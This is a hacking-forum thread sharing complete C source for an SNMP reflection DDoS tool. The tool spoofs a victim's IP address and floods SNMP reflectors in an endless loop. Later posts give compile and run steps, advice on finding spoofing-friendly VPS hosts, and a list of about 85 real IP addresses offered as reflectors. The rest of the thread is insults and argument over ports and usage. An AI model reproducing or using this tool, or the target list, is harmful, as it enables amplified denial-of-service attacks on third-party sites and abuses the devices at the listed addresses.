iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
SNMP Refelector DDOS | Cred Hex00010
  • PsYil0CY.bin
    Posts: 9
    All credit to Hex00010

    from Team P0ision

    http://r00tsecurity.org/db/exploits/288


    *
    Exploit Title: SNMP  Refelector DDOS
    Date:          9:2:11
    Author:        Hex00010
    Tested on: Comcast  Modems
    Contact:  uat666@hotmail.com
    */



    #include <stdio.h>
    #include <netinet/ip.h>
    #include <sys/socket.h>
    #include <arpa/inet.h>
    #include <netinet/udp.h>
    #include <string.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <sys/types.h>
    #include <asm/types.h>

    /*
    	The Government is a Corrupted Organization
    	We are here to show the world  the truth about them
    	You dont like it  - go fuck your self
    	Anarchy For Life Bitch
    	===============================================================================
    	THIS CODE IS MEANT TO STAY PRIVATE - DO NOT SHARE WITH ANYONE - It Is Now Public  you Can repost this BUT give Credits
    	===============================================================================	
    	by Hex00010 - TeaMp0ison - 2011


    */

    char payload[] = \"\x30\x23\x02\x01\x01\x04\x06\x70\x75\x62\x6c\x69\x63\xa5\x16\x02\x02\x4e\x47\"
    \"\x02\x01\x00\x02\x02\x08\xca\x30\x09\x30\x07\x06\x03\x2b\x06\x01\x05\x00\";

     struct iphdr ip_head;
     struct udphdr udp_head;
     struct sockaddr_in target;

     struct udp_pseudo        /*the udp pseudo header*/
     {
      unsigned int src_addr;
      unsigned int dst_addr;
      unsigned char  dummy;
      unsigned char  proto;
      unsigned short length;
     } pseudohead;

     struct help_checksum   /*struct for checksum calculation*/
     {
      struct udp_pseudo pshd;
      struct udphdr udphd;
     } udp_chk_construct;

    unsigned short in_cksum(unsigned short *addr,int len)
    {
     register int nleft=len;
     register unsigned short *w=addr;
     register int sum=0;
     unsigned short answer=0;

     while(nleft>1)
      {
       sum+=*w++;
       nleft-=2;
      }
     if(nleft==1)
      {
       *(u_char *)(&answer)=*(u_char *)w;
       sum+=answer;
      }
     sum=(sum >> 16)+(sum & 0xffff);
     sum+=(sum >> 16);
     answer=~sum;
     return(answer);
    }

    void send_udp(int sfd,unsigned int src,unsigned short src_p,
                 unsigned int dst,unsigned short dst_p,char *buffer,int len)
    {
     char *packet;
     int i;

     /*Prepare IP header*/
     ip_head.ihl      = 5;     /*headerlength with no options*/
     ip_head.version  = 4;
     ip_head.tos      = 22;
     ip_head.tot_len  = htons(sizeof(struct iphdr)+sizeof(struct udphdr)+sizeof(payload)-1);
     ip_head.id       = htons(30000 + (rand()%100));
     ip_head.frag_off = 0;
     ip_head.ttl      = 64;
     ip_head.protocol = IPPROTO_UDP;
     ip_head.check    = 0;    /*Must be zero for checksum calculation*/
     ip_head.saddr    = src;
     ip_head.daddr    = dst;

     ip_head.check    = in_cksum((unsigned short *)&ip_head,sizeof(struct iphdr));

     /*Prepare UDP header*/
     udp_head.source = htons(src_p);
     udp_head.dest = htons(dst_p);
     udp_head.len   = htons(sizeof(struct udphdr)+sizeof(payload)-1);
     udp_head.check   = 0;

     /*Assemble structure for checksum calculation and calculate checksum*/
     pseudohead.src_addr=ip_head.saddr;
     pseudohead.dst_addr=ip_head.daddr;
     pseudohead.dummy=0;
     pseudohead.proto=ip_head.protocol;
     pseudohead.length=htons(sizeof(struct udphdr)+sizeof(payload)-1);
     udp_chk_construct.pshd=pseudohead;
     udp_chk_construct.udphd=udp_head;
     packet=malloc(sizeof(struct help_checksum)+sizeof(payload)-1);
     memcpy(packet,&udp_chk_construct,sizeof(struct help_checksum)); /*pre-assemble packet for*/
     memcpy(packet+sizeof(struct help_checksum),buffer,sizeof(payload)-1);         /*checksum calculation*/
     udp_head.check=in_cksum((unsigned short *)packet,sizeof(struct help_checksum)+sizeof(payload)-1);
     free(packet);

     /*Assemble packet*/
     packet=malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+sizeof(payload)-1);
     memcpy(packet,(char *)&ip_head,sizeof(struct iphdr));
     memcpy(packet+sizeof(struct iphdr),(char *)&udp_head,sizeof(struct udphdr));
     memcpy(packet+sizeof(struct iphdr)+sizeof(struct udphdr),buffer,sizeof(payload)-1);

     /*Send packet*/
     target.sin_family     = AF_INET;
     target.sin_addr.s_addr= ip_head.daddr;
     target.sin_port       = udp_head.source;
     sendto(sfd,packet,sizeof(struct iphdr)+sizeof(struct udphdr)+sizeof(payload)-1,0,
                        (struct sockaddr *)&target,sizeof(struct sockaddr_in));
     free(packet);
    }

    int main(int argc, char *argv[]) {
    	int i=0;
    	unsigned int srcip, dstip;
    	char *data;
    	data=malloc(sizeof(payload)+sizeof(payload)-1);
    	memcpy(data, payload, sizeof(payload)-1);
    	char* aline = calloc(16, sizeof(char) );

    	if(argc < 3) {
    		printf(\"By  Hex00010 - TeaMp0ison - 2011\n\", argv[0]);
    		exit(1);
    	}

    	if((i=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0)  /*open sending socket*/
    	{
    		perror(\"socket\");
    		exit(1);
    	}

    	for(;;) {
    		FILE* fp = fopen( argv[2], \"r\" );
    		/* skip fopen checking because its not really necessary for what we're doing*/

    		while ( !feof(fp) )
    		{
    			fscanf( fp, \"%s\n\", aline );
    			srcip = inet_addr(argv[1]);
    			dstip = inet_addr(aline);
    			send_udp(i,srcip,161,dstip,161,payload,sizeof(payload)-1);
    			memset( aline, 0, 16 );
    		}
    		fclose(fp);
    	}
    	return 0;
    }

    /*
    Greetz:  Trick aka SayWhat? , Luit , Ins^ane,  joepie91, Sabu , Anonymous 
    */
  • Sh3llc0d3
    Posts: 1,910
    That is some sexual code! Love seeing C/C++ linux sockets - a lot nicer to read than winsock2
  • m0rph
    Posts: 332
    I like how time to live is set to 64, but you would probably only use this on a modem within your subnet...requiring maybe 2 to 3 hops max...lol

    So basically...the exploit constructs a UDP packet for a TCP/SNMP port...(Begin sarcasm...now!) I can't be certain, but last I checked UDP/SNMP port was 162...not 161 (TCP).

    Very strange usage too, it seems to me it goes like this:

    ./exploit [source IP] [File of destination IP's]

    Anyone else willing to verify that?

    Basically...yeah, it's cool and all, but this exploit is pretty useless unless your ISP is comcast, and you wanna fuck with people in your subnet.
    while( !(succeed = try() ) );
  • Hex00010
    Posts: 5
    Actually I only tested on Comcast but i have sent packets and ran a TCPDUMP and this effects every opearting system

    DO NOT RUN THIS ON YOUR LOCAL PC UNLESSS YOUR SYSTEM IS POWERFUL

    Other wise you have to upload it on a VPS the hosting provider must allow Packet spoofing otherwise this 0day will not work

    All you have to do is scan for SNMP ip's add them to a file such as file.txt and execute code like this




    gcc -o Hex00010 Hex00010.c
    ./Hex00010  <target ip>  <file.list>


    Below is a sample of ip's




    [code]
    99.4.139.230
    99.4.140.54
    99.4.140.62
    99.4.157.14
    99.5.80.166
    99.5.80.230
    99.4.139.194
    99.4.157.142
    99.5.84.110
    99.4.158.142
    99.4.83.246
    99.4.83.46
    99.4.159.182
    99.4.73.230
    99.4.158.214
    99.3.86.22
    99.4.90.86
    99.4.89.70
    99.4.159.134
    99.4.90.62
    99.4.92.166
    99.4.90.94
    99.6.176.94
    99.4.95.246
    99.5.116.94
    99.4.95.214
    99.6.176.118
    99.5.100.14
    99.5.100.182
    99.5.228.6
    99.4.95.158
    99.6.177.54
    99.4.137.54
    99.6.177.126
    99.4.139.126
    99.5.100.214
    99.5.102.14
    99.6.182.118
    99.6.180.22
    99.6.177.26
    99.6.182.174
    99.5.111.38
    99.5.80.134
    99.6.182.158
    99.6.182.150
    99.6.182.198
    99.6.182.182
    99.5.100.166
    99.5.85.134
    99.6.182.86
    99.5.85.254
    99.5.85.141
    99.9.250.142
    99.5.83.222
    99.9.250.182
    99.9.250.174
    99.9.251.30
    99.8.249.14
    99.5.98.190
    99.4.92.158
    99.5.99.22
    99.4.93.230
    99.9.129.202
    98.133.197.48
    99.6.184.142
    98.133.197.61
    99.7.168.117
    99.8.184.151
    99.8.255.13
    98.133.197.241
    99.0.76.54
    99.5.82.161
    99.6.177.182
    98.133.197.91
    99.2.224.38
    98.133.197.136
    98.133.197.168
    99.2.250.6
    98.133.197.101
    99.252.32.210
    98.132.117.4
    98.133.197.115
    74.52.103.130
    74.52.158.202
    74.52.196.66
    72.232.124.34
    [/code]




    Run a whois check on all those ip's and check for your self its running SNMP

    Also while in a shell  open up another shell and execute the following command

    [code]
    tcpdump -ni eth1 -w Packets.cap not port 22
    [/code]

    If you are running this locally on your pc execute this command only

    [code]
    tcpdump -ni eth1 -w Packets.cap
    [/code]


    If it gives you some error about eth1 type this command

    [code]
    ifconfig
    [/code]

    and  get the name of your network name thing and replace it with eth1

    Attack a site for like  30 seconds stop the attack and open up the  .cap file by execute the following command


    [code]
    tcpdump -r Packets.cap



    Hope this helps
  • m0rph
    Posts: 332
    said:


    1)Actually I only tested on Comcast but i have sent packets and ran a TCPDUMP and this effects every opearting system
    ...
    2)DO NOT RUN THIS ON YOUR LOCAL PC UNLESSS YOUR SYSTEM IS POWERFUL
    ...
    3)Other wise you have to upload it on a VPS the hosting provider must allow Packet spoofing otherwise this 0day will not work
    ...
    4)All you have to do is scan for SNMP ip's
    ...
    5)Run a whois check on all those ip's
    ...
    6)If it gives you some error about eth1 type this command
    ...
    7)and get the name of your network name thing and replace it with eth1


    1) If you only tested on Comcast modems, how do you know it works on others? Keep in mind, I'm using your own words against you.

    2) LOL!!!

    3) Of course...why didn't I think of a VPS that spoofz all yur packetz?

    4) Refer to number 2

    5) Why do that, when I could import that same list of ip's into...oh I dont know...NMap???? And scan all the IP's for UDP/SNMP ports??? Also, refer to number 4.

    6) "some error about eth1" ......wow.

    7) "network name thing" ... I can't be certain, but I would think someone who has the knowledge to program in C++, AND fully construct a packet complete with a UDP header, and shellcode, would understand what a "network name thing" is actually called **cough** interface **cough**.

    Give it up dude...I didn't even have to read through your whole post to know who you really are. Who else has claimed to be the author of a tool that they really weren't on this forum? Who else would create an account to make one post, only to disappear and start the cycle over again?

    What's sad is, you're almost a man now, but you still act like you're 12. When's graduation darkgt4? This year? Next year? Surely it must be coming soon, yeah?

    What truly made me laugh though, was that you used tcpdump for a tool that attacks with udp. For shame...
    while( !(succeed = try() ) );
  • Hex00010
    Posts: 5
    WoW your a dick

    1. re-read my same statement that answers your questions
    2. Test it out and see if u lol
    3. Not All hosting corporations allow spoofed packets only certain ones allow that so...........
    4. You would be surprised at how many people wouldnt know that or what to do
    5. Run the whois for verification on the IP' Some people do other diff ways not everyone uses ummm less say Nmap?
    6/7. I can pretty much call it whatever i want however due to the fact of my unavailability to think clearly due to THC that is my excuess


    You know you come off like a dick trying to act like you can own someone

    You know its people like you that fuck the scene up due to the fact of there Social Emotionality on how good they think they are


    Anything else?

    FYI dipshit

    Run the TCPDUMP while u attack the site and reading the dam .cap file your intelligence is pathetic

    Your intelligence is what made me laugh
  • McKittrick
    Posts: 194
    i have never heard of SNMP in relation to port 163. also, doesn't SNMP use TCP when doing a BULK GET in version 3?
  • m0rph
    Posts: 332
    said:


    i have never heard of SNMP in relation to port 163. also, doesn't SNMP use TCP when doing a BULK GET in version 3?


    Agreed, McKittrick. This clown registered almost immediately after this thread was made. Just another skid trying to show off his internet dick. He didn't even get the usage right:
    said:


    gcc -o Hex00010 Hex00010.c
    ./Hex00010 <target ip> <file.list>


    Why would you need to select 1 target IP from the first argument, and then an entire list of target IP's in the second? That's stupid.

    Besides the code below...:

    for(;;) {
            FILE* fp = fopen( argv&#91;2&#93;, \"r\" );
            while ( !feof(fp) )
            {
                fscanf( fp, \"%s\n\", aline );
                &#46;&#46;&#46;
                dstip = inet_addr(aline);
                &#46;&#46;&#46;

    ...clearly says that a pointer is set to read a file with a list of "dstip" (destination IP's) from the 2nd argument. The first argument:

     while ( !feof(fp) )
            {
                &#46;&#46;&#46;
                srcip = inet_addr(argv&#91;1&#93;);
                &#46;&#46;&#46;
                send_udp(i,srcip,161,dstip,161,payload,sizeof(payload)-1);
                &#46;&#46;&#46;
            }

    Is asking to set the source IP for the packet...hence my conclusion of the usage:
    ./exploit [source IP] [File of Destination IP's]

    This wannabe that joined just to post on this thread is a moron.
    Yes, I also agree with you on the mistake that a UDP exploit is targeting a TCP port. It could have been tampered with to stop skids like this fake Hex01000 from using it.
    while( !(succeed = try() ) );
  • Hex00010
    Posts: 5
    @McKittrick Here you go

    http://technet.microsoft.com/en-us/libr ... 59643.aspx

    that should answer your question

    @m0rph once again your a dipshit

    Let me go reallly simple for u


    Param 1 = Target
    Param 2 = list.txt

    i want to attack google.com

    ./rawr google ip lists.txt


    lets say i scanned 100 ip's

    i place those 100 ip's in lists.txt

    the lists.txt now attacks google ip



    Once Again mate learn 2 quit


    Ooo btw i found it funny how i replied what LONG AGO and you NEVER EVER EVER replied ONCE

    but now that some guy just so happens to reply your the first fucker to post the second message
  • m0rph
    Posts: 332
    said:


    Ooo btw i found it funny how i replied what LONG AGO and you NEVER EVER EVER replied ONCE


    Because I have self control and I really don't care what some random troll has to say over the internet.
    while( !(succeed = try() ) );
  • x3n0n
    Posts: 110
    http://profile.ak.fbcdn.net/hprofile-ak-snc4/41784_2253543784_4474_n.jpg
Add a Comment